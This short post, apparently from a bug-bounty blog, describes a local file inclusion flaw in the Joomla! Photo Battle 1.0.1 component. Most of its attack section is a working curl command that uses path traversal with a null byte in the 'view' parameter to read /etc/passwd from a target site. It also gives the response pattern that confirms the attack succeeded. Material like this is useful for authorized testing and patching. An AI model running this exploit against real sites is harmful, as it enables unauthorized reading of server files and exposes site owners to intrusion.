Bug Name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
Severity:
medium
Priority: P3
Risk Level: MEDIUM - 6/10
CVSS Score: 5
Description:
A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
Exploit Commands
Bash
curl -i -s -k -X 'GET' \
'https://example.com/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00'
⚠️ Warning: These commands are for authorized security testing only. Unauthorized access is illegal.
Expected Matchers
- root:.:0:0:
Status codes to expect: 200
Thanks for reading! If you found this useful, feel free to share it with your fellow hunters. Happy hacking!
